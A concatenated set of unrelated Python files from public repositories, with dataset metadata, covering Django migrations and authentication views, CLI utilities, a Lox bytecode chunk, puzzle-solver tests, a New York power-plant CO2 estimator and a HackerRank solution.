] | 3 | 2020-02-11T22:26:54.000Z | 2021-06-10T17:43:27.000Z | roadmap/migrations/0001_initial.py | bitlabstudio/django-roadmap | 72cdc20bcd129ffb00395d5b1215fedbf59218b2 | [
"MIT"
] | 1 | 2016-04-13T21:16:25.000Z | 2016-04-13T21:16:25.000Z | # flake8: noqa
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Milestone'
db.create_table('roadmap_milestone', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('start_date', self.gf('django.db.models.fields.DateField')()),
))
db.send_create_signal('roadmap', ['Milestone'])
# Adding model 'MilestoneTranslation'
db.create_table('roadmap_milestonetranslation', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('milestone', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['roadmap.Milestone'])),
('name', self.gf('django.db.models.fields.CharField')(max_length=1024)),
('language', self.gf('django.db.models.fields.CharField')(max_length=5)),
))
db.send_create_signal('roadmap', ['MilestoneTranslation'])
def backwards(self, orm):
# Deleting model 'Milestone'
db.delete_table('roadmap_milestone')
# Deleting model 'MilestoneTranslation'
db.delete_table('roadmap_milestonetranslation')
models = {
'roadmap.milestone': {
'Meta': {'object_name': 'Milestone'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {})
},
'roadmap.milestonetranslation': {
'Meta': {'object_name': 'MilestoneTranslation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'milestone': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['roadmap.Milestone']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
}
}
complete_apps = ['roadmap']
| 39.245283 | 112 | 0.605769 | 213 | 2,080 | 5.798122 | 0.262911 | 0.084211 | 0.136032 | 0.194332 | 0.508502 | 0.437247 | 0.411336 | 0.411336 | 0.3417 | 0.232389 | 0 | 0.007946 | 0.213462 | 2,080 | 52 | 113 | 40 | 0.746944 | 0.076923 | 0 | 0.166667 | 0 | 0 | 0.431783 | 0.27287 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.111111 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
94b5e68f3e111b96fca699f4d5fd4ef4b76998fd | 6,284 | py | Python | cappylib/general.py | ChrisPappalardo/cappylib | e7f469e51bac5d35444514f5504728cc81c1d678 | [
"MIT"
] | 1 | 2016-05-29T17:22:30.000Z | 2016-05-29T17:22:30.000Z | cappylib/general.py | ChrisPappalardo/cappylib | e7f469e51bac5d35444514f5504728cc81c1d678 | [
"MIT"
] | null | null | null | cappylib/general.py | ChrisPappalardo/cappylib | e7f469e51bac5d35444514f5504728cc81c1d678 | [
"MIT"
] | null | null | null | ##############################################################################################
# HEADER
#
# cappylib/general.py - defines useful functions for python scripts
#
# Copyright (C) 2008-2013 Chris Pappalardo <cpappala@yahoo.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
# to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
##############################################################################################
##############################################################################################
# IMPORTS
##############################################################################################
import sys, re, ast
##############################################################################################
# GLOBAL VARS
##############################################################################################
##############################################################################################
# MAIN CODE
##############################################################################################
# enumerations class
class enum:
# days of the week
class weekdays:
MONDAY = 0
TUESDAY = 1
WEDNESDAY = 2
THURSDAY = 3
FRIDAY = 4
SATURDAY = 5
SUNDAY = 6
# error class - extends base exception class with a string
class error(Exception):
"""extends Exception class with additional information and message listing"""
def __init__(self, location, eType, *messages):
m = '%s: %s %s' % (location, eType, ' '.join(messages))
self.error = m # for backwards compatibility
super(error, self).__init__(m)
# aColor - returns ANSI codes for a given set of formats
def aColor(codeString):
"""returns ANSI encoded string for a given set of ; separated format codes"""
# define ANSI codes
ansiCodeMask = '\033[{0}m'
ansiColorCodes = {
'OFF': 0,
'BOLD': 1,
'ITALIC': 3,
'UNDERLINE': 4,
'BLINK': 5,
'BLACK': 30,
'RED': 31,
'GREEN': 32,
'YELLOW': 33,
'BLUE': 34,
'MAGENTA': 35,
'CYAN': 36,
'WHITE': 37,
'B': 10, # background code offset
'I': 60 # intensity code offset
}
# create ANSI encoded string from format codeString
offset = 0
codes = []
for c in codeString.split(';'):
if c in ('B','I'):
offset += ansiColorCodes[c]
else:
codes.append(offset + ansiColorCodes[c])
offset = 0
# return ANSI string
return ''.join([ansiCodeMask.format(c) for c in codes])
# argParse - map CLI args to a keyMap and optionally parse for a key/value
def argParse(keyMap=None, keySearch=None, valueSearch=None):
"""map CLI args to a keyMap an optionally parse for a key/value"""
args = sys.argv[1:] if len(sys.argv) > 1 else []
keyMap = keyMap if keyMap else []
# step through a copy of args and extract any --<var>='<value>' elements
keyValuePairs = {}
for arg in list(args):
r = re.search('--(.+?)=[\'"]{0,1}(.*)[\'"]{0,1}', arg, (re.MULTILINE | re.DOTALL))
if r:
args.remove(arg)
keyValuePairs[r.group(1)] = r.group(2)
# if --ast_eval=True was passed, call ast eval on each value in keyValuePairs
if 'ast_eval' in keyValuePairs and keyValuePairs['ast_eval']:
keyValuePairs = dict([(key, ast.literal_eval(keyValuePairs[key]))
for key in keyValuePairs.keys()])
# map keyMap to args, adding filename
mappedArgs = dict(zip(['__file'] + keyMap, [sys.argv[0]] + args))
# merge key mapped dict with key value pairs dict
mappedArgs = dict(mappedArgs.items() + keyValuePairs.items())
# ensure all kepMap keys have a value
for key in keyMap:
if key not in mappedArgs:
mappedArgs[key] = None
# if valueSearch, return true if value in args|mappedArgs, else false
if valueSearch:
found = valueSearch in args or valueSearch in mappedArgs.values()
return True if found else False
# if keySearch, return value if key is defined, else false
if keySearch:
return mappedArgs[keySearch] if keySearch in mappedArgs else False
# if a keyMap or keyValuePairs were passed, return mappedArgs, else args
return mappedArgs if (keyMap or keyValuePairs) and mappedArgs else args
##############################################################################################
# TESTING
##############################################################################################
def main():
# argParse test
print 'argParse()... ', argParse()
print 'argParse(keyMap=[one, two, three])... ', argParse(keyMap=['one','two','three'])
print 'argParse(keyMap=[one, two, three],keySearch=one)... ', \
argParse(keyMap=["one","two","three"], keySearch='one')
print 'argParse(valueSearch="2")... ', argParse(valueSearch='2')
# error test
try:
raise error('test', 'error', 'fi', 'fo', 'fum')
except error as e: print 'error... ', e.error
# color test
print 'aColor... ' + aColor('BOLD;B;I;GREEN') + '1' + aColor('OFF')
if __name__ == '__main__':
try:
main()
except error as e: print e.error
| 37.404762 | 94 | 0.539624 | 703 | 6,284 | 4.792319 | 0.392603 | 0.026121 | 0.01306 | 0.023746 | 0.102107 | 0.059662 | 0.021965 | 0 | 0 | 0 | 0 | 0.011796 | 0.217537 | 6,284 | 167 | 95 | 37.628743 | 0.673378 | 0.332113 | 0 | 0.05 | 0 | 0 | 0.118809 | 0.031459 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0125 | null | null | 0.0875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
94b8b664d0dd876b7f4a4856901673566775c638 | 4,598 | py | Python | core/views.py | UmerSE/django-login | ee980962a2d68f77d2e56df96dd1ed6e4e70d9ce | [
"Apache-2.0"
] | null | null | null | core/views.py | UmerSE/django-login | ee980962a2d68f77d2e56df96dd1ed6e4e70d9ce | [
"Apache-2.0"
] | null | null | null | core/views.py | UmerSE/django-login | ee980962a2d68f77d2e56df96dd1ed6e4e70d9ce | [
"Apache-2.0"
] | null | null | null | from django.shortcuts import render, redirect
from core import models
from django.contrib import messages
from django.core.mail import send_mail
from app import settings
# from django.contrib.sites.shortcuts import get_current_site
# from django.template.loader import render_to_string
# from django.utils.http import urlsafe_base64_decode, urlsafe_base64_encode
from django.utils.http import urlsafe_base64_decode
# from django.utils.encoding import force_bytes, force_text
from django.utils.encoding import force_text
from django.contrib.auth import authenticate, login, logout
from core.utils import generate_token
from django.views import generic
# Create your views here.
class HomeView(generic.TemplateView):
template_name = "authentication/index.html"
def signup(request):
if request.method == "POST":
username = request.POST['username']
fname = request.POST['fname']
lname = request.POST['lname']
email = request.POST['email']
pass1 = request.POST['pass1']
pass2 = request.POST['pass2']
if models.User.objects.filter(username=username):
messages.error(request, "Username already exist! Please try some other username.")
return redirect('home')
if models.User.objects.filter(email=email).exists():
messages.error(request, "Email Already Registered!!")
return redirect('home')
if len(username)>20:
messages.error(request, "Username must be under 20 charcters!!")
return redirect('home')
if pass1 != pass2:
messages.error(request, "Passwords didn't matched!!")
return redirect('home')
if not username.isalnum():
messages.error(request, "Username must be Alpha-Numeric!!")
return redirect('home')
myuser = models.User(first_name=fname, last_name=lname, username=username, email=email)
myuser.set_password(pass1)
myuser.save()
messages.success(request, "Your Account has been created succesfully!! Please check your email to confirm your email address in order to activate your account.")
# Welcome Email
subject = "Welcome to Login!!"
message = "Hello " + myuser.first_name + "!! \n" + "Welcome to login!!\n. We have also sent you a confirmation email, please confirm your email address. \n\n"
from_email = settings.EMAIL_HOST_USER
to_list = [myuser.email]
send_mail(subject, message, from_email, to_list, fail_silently=False)
# Email Address Confirmation Email
# current_site = get_current_site(request)
# email_subject = "Confirm your Email @ Login!!"
# message2 = render_to_string('email_confirmation.html',{
# 'name': myuser.first_name,
# 'domain': current_site.domain,
# 'uid': urlsafe_base64_encode(force_bytes(myuser.pk)),
# 'token': generate_token.make_token(myuser)
# })
#email.send()
return redirect('signin')
return render(request, "authentication/signup.html")
def activate(request,uidb64,token):
try:
uid = force_text(urlsafe_base64_decode(uidb64))
myuser = models.User.objects.get(pk=uid)
except (TypeError,ValueError,OverflowError,models.User.DoesNotExist):
myuser = None
if myuser is not None and generate_token.check_token(myuser,token):
myuser.is_active = True
# user.profile.signup_confirmation = True
myuser.save()
login(request,myuser)
messages.success(request, "Your Account has been activated!!")
return redirect('signin')
else:
return render(request,'activation_failed.html')
def signin(request):
if request.method == 'POST':
username = request.POST['username']
pass1 = request.POST['pass1']
user = authenticate(username=username, password=pass1)
if user is not None:
login(request, user)
fname = user.first_name
# messages.success(request, "Logged In Sucessfully!!")
return render(request, "authentication/index.html",{"fname":fname})
else:
messages.error(request, "Bad Credentials!!")
return redirect('home')
return render(request, "authentication/signin.html")
def signout(request):
logout(request)
messages.success(request, "Logged Out Successfully!!")
return redirect('home') | 38.316667 | 174 | 0.64876 | 523 | 4,598 | 5.606119 | 0.294455 | 0.037517 | 0.042974 | 0.027285 | 0.15689 | 0.139836 | 0.093452 | 0.066166 | 0.036153 | 0 | 0 | 0.008411 | 0.250109 | 4,598 | 120 | 175 | 38.316667 | 0.841937 | 0.160505 | 0 | 0.220779 | 0 | 0.025974 | 0.192868 | 0.032275 | 0.012987 | 0 | 0 | 0 | 0 | 1 | 0.051948 | false | 0.090909 | 0.12987 | 0 | 0.376623 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
94bbd930eae95498ca6ae42c0c9ecc9be26d6453 | 1,553 | py | Python | events/eventsapi/migrations/0002_eventdetails_eventgallery_userdetails.py | Akshat1903/Events-Portal-Backend | b67dbc3b91d830fdcea17ab652b4e9ee13d4006f | [
"MIT"
] | 1 | 2021-02-22T17:05:47.000Z | 2021-02-22T17:05:47.000Z | events/eventsapi/migrations/0002_eventdetails_eventgallery_userdetails.py | Akshat1903/Events-Portal-Backend | b67dbc3b91d830fdcea17ab652b4e9ee13d4006f | [
"MIT"
] | null | null | null | events/eventsapi/migrations/0002_eventdetails_eventgallery_userdetails.py | Akshat1903/Events-Portal-Backend | b67dbc3b91d830fdcea17ab652b4e9ee13d4006f | [
"MIT"
] | 2 | 2021-02-08T08:13:03.000Z | 2021-02-09T13:10:30.000Z | # Generated by Django 3.0.8 on 2021-02-20 13:51
import ckeditor.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('eventsapi', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='UserDetails',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='EventGallery',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('gallery_image', models.TextField()),
('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='event_gallery', to='eventsapi.Event')),
],
),
migrations.CreateModel(
name='EventDetails',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('event_date', models.DateField()),
('description', ckeditor.fields.RichTextField(blank=True, null=True)),
('main_image', models.TextField()),
('banner_image', models.TextField()),
('event', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='event_description', to='eventsapi.Event')),
],
),
]
| 37.878049 | 149 | 0.589182 | 150 | 1,553 | 5.966667 | 0.4 | 0.035754 | 0.046927 | 0.073743 | 0.452514 | 0.38324 | 0.38324 | 0.38324 | 0.38324 | 0.38324 | 0 | 0.016814 | 0.272376 | 1,553 | 40 | 150 | 38.825 | 0.775221 | 0.028976 | 0 | 0.441176 | 1 | 0 | 0.128818 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.088235 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
94bcb149b2cf9cc99d00ec9d26c5fde8664209ea | 653 | py | Python | books/crafting_interpreters/pylox/lox/chunk.py | thundergolfer/uni | e604d1edd8e5085f0ae1c0211015db38c07fc926 | [
"MIT"
] | 1 | 2022-01-06T04:50:09.000Z | 2022-01-06T04:50:09.000Z | books/crafting_interpreters/pylox/lox/chunk.py | thundergolfer/uni | e604d1edd8e5085f0ae1c0211015db38c07fc926 | [
"MIT"
] | 1 | 2022-01-23T06:09:21.000Z | 2022-01-23T06:14:17.000Z | books/crafting_interpreters/pylox/lox/chunk.py | thundergolfer/uni | e604d1edd8e5085f0ae1c0211015db38c07fc926 | [
"MIT"
] | null | null | null | import dataclasses
import enum
import value
@enum.unique
class OpCode(enum.IntEnum):
OP_CONSTANT = enum.auto()
OP_RETURN = enum.auto()
@dataclasses.dataclass(frozen=False)
class Chunk:
code: bytearray
constants: list[value.Value]
def init_chunk() -> Chunk:
return Chunk(
code=bytearray(),
constants=[],
)
def write_chunk(chunk: Chunk, byte_: int) -> None:
if 0 > byte_ > 255:
raise ValueError(f"{byte_=} must be in the range [0-255].")
chunk.code.append(byte_)
def add_constant(chunk: Chunk, val: value.Value) -> int:
chunk.constants.append(val)
return len(chunk.constants) - 1
| 18.657143 | 67 | 0.658499 | 86 | 653 | 4.895349 | 0.488372 | 0.095012 | 0.085511 | 0.128266 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017544 | 0.214395 | 653 | 34 | 68 | 19.205882 | 0.803119 | 0 | 0 | 0 | 0 | 0 | 0.058193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0 | 0.130435 | 0.043478 | 0.608696 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
94c812ed8eea3a891394ca2d2863a8988d1aa7e0 | 3,770 | py | Python | spec/puzzle/steps/generate_solutions_spec.py | PhilHarnish/forge | 663f19d759b94d84935c14915922070635a4af65 | [
"MIT"
] | 2 | 2020-08-18T18:43:09.000Z | 2020-08-18T20:05:59.000Z | spec/puzzle/steps/generate_solutions_spec.py | PhilHarnish/forge | 663f19d759b94d84935c14915922070635a4af65 | [
"MIT"
] | null | null | null | spec/puzzle/steps/generate_solutions_spec.py | PhilHarnish/forge | 663f19d759b94d84935c14915922070635a4af65 | [
"MIT"
] | null | null | null | import collections
from puzzle.constraints import solution_constraints
from puzzle.steps import generate_solutions
from spec.mamba import *
_SOLUTIONS = collections.OrderedDict((
('early_low', 0.1),
('early_high', 1.0),
('after_early_high', 0.9),
('mid_low', 0.2),
('late_mid', 0.5),
('late_low', 0.3),
('late_high', 0.8),
))
def _source() -> generate_solutions.Solutions:
yield from _SOLUTIONS.items()
with description('generate_solutions') as self:
with before.each:
self.constraints = solution_constraints.SolutionConstraints()
with description('constructor'):
with it('constructs without error'):
expect(calling(
generate_solutions.GenerateSolutions, self.constraints, _source)
).not_to(raise_error)
with it('does not read source until needed'):
source = mock.Mock(return_value=_source())
generate_solutions.GenerateSolutions(self.constraints, source)
expect(source).not_to(have_been_called_once)
with description('generation'):
with before.each:
self.source_iter = _source()
self.source = mock.Mock(return_value=self.source_iter)
self.ex = generate_solutions.GenerateSolutions(
self.constraints, self.source)
with it('produces solutions'):
expect(self.ex.solutions()).to(equal(_SOLUTIONS))
with it('only calls source once'):
self.ex.solutions()
self.ex.solutions()
expect(self.source).to(have_been_called_once)
with it('constrains solutions'):
self.constraints.weight_threshold = 1.0
expect(self.ex.solutions()).to(equal({'early_high': 1.0}))
with it('only calls source once, even if reconstrained'):
self.ex.solutions()
self.constraints.weight_threshold = 0.5
self.ex.solutions()
expect(self.source).to(have_been_called_once)
with it('solutions() returns all results'):
expect(list(self.ex.solutions().items())).to(equal(
list(sorted(_SOLUTIONS.items(), key=lambda x: x[1], reverse=True))))
with it('solutions stream via yield'):
expect(self.ex.solution).to(equal('early_high'))
# Prove there are still items left in the iterator:
expect(calling(next, self.source_iter)).to(equal(
('after_early_high', 0.9)))
with description('event broadcasting'):
with it('sends an event solutions have changed'):
on_change_stub = mock.Mock()
self.ex.subscribe(on_change_stub)
self.constraints.weight_threshold = 0.5
expect(on_change_stub.on_next).to(have_been_called_once)
with description('interrupting iteration'):
with before.each:
self.iterations = 0
self.stop_iterations = 0
def source_iter() -> generate_solutions.Solutions:
for k, v in _SOLUTIONS.items():
while v < self.constraints.weight_threshold:
self.stop_iterations += 1
yield StopIteration()
self.iterations += 1
yield k, v
self.source_iter = source_iter()
self.source = mock.Mock(return_value=self.source_iter)
self.ex = generate_solutions.GenerateSolutions(self.constraints, self.source)
with it('still produces solutions'):
expect(self.ex.solutions()).to(equal(_SOLUTIONS))
expect(self.iterations).to(equal(len(_SOLUTIONS)))
with it('stops if constraints require'):
self.constraints.weight_threshold = 0.5
self.ex.solutions()
expect(self.iterations).to(be_below(len(_SOLUTIONS)))
expect(self.stop_iterations).to(equal(1))
with it('resumes if constraints change'):
self.constraints.weight_threshold = 0.5
self.ex.solutions()
self.constraints.weight_threshold = 0.0
self.ex.solutions()
expect(self.iterations).to(equal(len(_SOLUTIONS)))
| 34.907407 | 83 | 0.682228 | 477 | 3,770 | 5.228512 | 0.243187 | 0.036087 | 0.066159 | 0.084202 | 0.450281 | 0.411788 | 0.323577 | 0.288292 | 0.234964 | 0.172815 | 0 | 0.011811 | 0.191512 | 3,770 | 107 | 84 | 35.233645 | 0.80643 | 0.012997 | 0 | 0.25 | 1 | 0 | 0.139554 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022727 | false | 0 | 0.045455 | 0 | 0.068182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
94cc9616c0ef938ae80a72ecf0086c7fb614f196 | 3,892 | py | Python | src/nypower/calc.py | hongjsk/ny-power | d892f194f621555d65df4ba3dcd3ccaabb64b72d | [
"Apache-2.0"
] | 46 | 2018-04-10T15:57:51.000Z | 2021-11-16T12:14:47.000Z | src/nypower/calc.py | hongjsk/ny-power | d892f194f621555d65df4ba3dcd3ccaabb64b72d | [
"Apache-2.0"
] | 5 | 2018-05-07T18:53:18.000Z | 2018-11-30T13:17:00.000Z | src/nypower/calc.py | hongjsk/ny-power | d892f194f621555d65df4ba3dcd3ccaabb64b72d | [
"Apache-2.0"
] | 28 | 2018-04-10T15:48:09.000Z | 2022-02-02T22:16:52.000Z | """Calculators for different values.
In order to approximate the emissions for a single kWh of produced
energy, per power source we look at the following 2016 data sets.
* Detailed EIA-923 emissions survey data
(https://www.eia.gov/electricity/data/state/emission_annual.xls)
* Net Generation by State by Type of Producer by Energy Source
(EIA-906, EIA-920, and EIA-923)
(https://www.eia.gov/electricity/data/state/annual_generation_state.xls)
The NY Numbers for 2016 on power generation are (power in MWh)
2016 NY Total Electric Power Industry Total 134,417,107
2016 NY Total Electric Power Industry Coal 1,770,238
2016 NY Total Electric Power Industry Pumped Storage -470,932
2016 NY Total Electric Power Industry Hydroelectric Conventional 26,888,234
2016 NY Total Electric Power Industry Natural Gas 56,793,336
2016 NY Total Electric Power Industry Nuclear 41,570,990
2016 NY Total Electric Power Industry Other Gases 0
2016 NY Total Electric Power Industry Other 898,989
2016 NY Total Electric Power Industry Petroleum 642,952
2016 NY Total Electric Power Industry Solar Thermal and Photovoltaic 139,611
2016 NY Total Electric Power Industry Other Biomass 1,604,650
2016 NY Total Electric Power Industry Wind 3,940,180
2016 NY Total Electric Power Industry Wood and Wood Derived Fuels 638,859
The NY Numbers on Emissions are (metric tons of CO2, SO2, NOx)
2016 NY Total Electric Power Industry All Sources 31,295,191 18,372 32,161
2016 NY Total Electric Power Industry Coal 2,145,561 10,744 2,635
2016 NY Total Electric Power Industry Natural Gas 26,865,277 122 14,538
2016 NY Total Electric Power Industry Other Biomass 0 1 8,966
2016 NY Total Electric Power Industry Other 1,660,517 960 3,991
2016 NY Total Electric Power Industry Petroleum 623,836 1,688 930
2016 NY Total Electric Power Industry Wood and Wood Derived Fuels 0 4,857 1,101
Duel Fuel systems are interesting, they are designed to burn either
Natural Gas, or Petroleum when access to NG is limited by price or
capacity. (Under extreme cold conditions NG supply is prioritized for
heating)
We then make the following simplifying assumptions (given access to the data):
* All natural gas generation is the same from emissions perspective
* The duel fuel systems burned 30% of the total NG in the state, and
all of the Petroleum. Based on eyeballing the Duel Fuel systems,
they tend to be running slightly less than straight NG systems.
* The mix of NG / Oil burned in duel fuel plants is constant
throughout the year. This is clearly not true, but there is no
better time resolution information available.
* All other fossil fuels means Coal. All Coal is equivalent from
emissions perspective.
"""
# PWR in MWh
# CO2 in Metric Tons
#
# TODO(sdague): add in
FUEL_2016 = {
"Petroleum": {
"Power": 642952,
"CO2": 623836
},
"Natural Gas": {
"Power": 56793336,
"CO2": 26865277
},
"Other Fossil Fuels": {
"Power": 1770238,
"CO2": 2145561
}
}
# assume Dual Fuel systems consume 30% of state NG. That's probably low.
FUEL_2016["Dual Fuel"] = {
"Power": (FUEL_2016["Petroleum"]["Power"] +
(FUEL_2016["Natural Gas"]["Power"] * .3)),
"CO2": (FUEL_2016["Petroleum"]["CO2"] +
(FUEL_2016["Natural Gas"]["CO2"] * .3)),
}
# Calculate CO2 per kWh usage
def co2_for_fuel(fuel):
"Returns metric tons per / MWh, or kg / kWh"
if fuel in FUEL_2016:
hpow = FUEL_2016[fuel]["Power"]
hco2 = FUEL_2016[fuel]["CO2"]
co2per = float(hco2) / float(hpow)
return co2per
else:
return 0.0
def co2_rollup(rows):
total_kW = 0
total_co2 = 0
for row in rows:
fuel_name = row[2]
kW = int(float(row[3]))
total_kW += kW
total_co2 += kW * co2_for_fuel(fuel_name)
co2_per_kW = total_co2 / total_kW
return co2_per_kW
| 33.843478 | 79 | 0.720709 | 622 | 3,892 | 4.463023 | 0.385852 | 0.043228 | 0.079251 | 0.136888 | 0.302233 | 0.302233 | 0.221542 | 0.101585 | 0.039625 | 0.039625 | 0 | 0.126336 | 0.206835 | 3,892 | 114 | 80 | 34.140351 | 0.772919 | 0.821942 | 0 | 0 | 0 | 0 | 0.178056 | 0 | 0 | 0 | 0 | 0.008772 | 0 | 1 | 0.051282 | false | 0 | 0 | 0 | 0.128205 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
94d15fd96c06a60978eb9873d80feabdc79ed4a5 | 304 | py | Python | Part2/comment_test.py | BaiMoHan/LearningPython_ING_202002 | 90d1152b66e8efa284b75b4b76fbf29d7d61e900 | [
"MIT"
] | null | null | null | Part2/comment_test.py | BaiMoHan/LearningPython_ING_202002 | 90d1152b66e8efa284b75b4b76fbf29d7d61e900 | [
"MIT"
] | null | null | null | Part2/comment_test.py | BaiMoHan/LearningPython_ING_202002 | 90d1152b66e8efa284b75b4b76fbf29d7d61e900 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/2/11 14:23
# @Author : Baimohan/PH
# @Site : https://github.com/BaiMoHan
# @File : comment_test.py
# @Software: PyCharm
print("hello world")
# 这是一行注释
'''
多行注释
单引号形式
'''
"""
双引号多注释 三个双引号
"""
print("测试")
a = 5
print(a)
a += 3
print(a)
| 13.818182 | 40 | 0.588816 | 45 | 304 | 3.955556 | 0.844444 | 0.067416 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056911 | 0.190789 | 304 | 21 | 41 | 14.47619 | 0.666667 | 0.605263 | 0 | 0.333333 | 0 | 0 | 0.175676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
94d2fa8ed41b130939e6d5ba9082e67b5cb90786 | 885 | py | Python | Python/Itertools/Maximize it/maximize_it.py | brianchiang-tw/HackerRank | 02a30a0033b881206fa15b8d6b4ef99b2dc420c8 | [
"MIT"
] | 2 | 2020-05-28T07:15:00.000Z | 2020-07-21T08:34:06.000Z | Python/Itertools/Maximize it/maximize_it.py | brianchiang-tw/HackerRank | 02a30a0033b881206fa15b8d6b4ef99b2dc420c8 | [
"MIT"
] | null | null | null | Python/Itertools/Maximize it/maximize_it.py | brianchiang-tw/HackerRank | 02a30a0033b881206fa15b8d6b4ef99b2dc420c8 | [
"MIT"
] | null | null | null | # Enter your code here. Read input from STDIN. Print output to STDOUT
from typing import List
from itertools import product
def sum_of_square_mod_m( nums:tuple, mod_m ):
return ( sum( map( lambda x: x**2, nums) ) % mod_m )
def maximize_function_value( list_of_list:List , mod_m):
count_of_list = len( list_of_list )
all_possible_combination = list( product( *list_of_list ) )
max_fn_value = -1
for one_trial in all_possible_combination:
# update max function value
max_fn_value = max(sum_of_square_mod_m( one_trial, mod_m ), max_fn_value)
print( max_fn_value )
if __name__ == '__main__':
buf = list( map( int, input().split() ) )
k, m = buf[0], buf[1]
list_of_list = []
for _ in range(k):
list_of_list.append( list( map( int, input().split() ) )[1:] )
maximize_function_value( list_of_list, m )
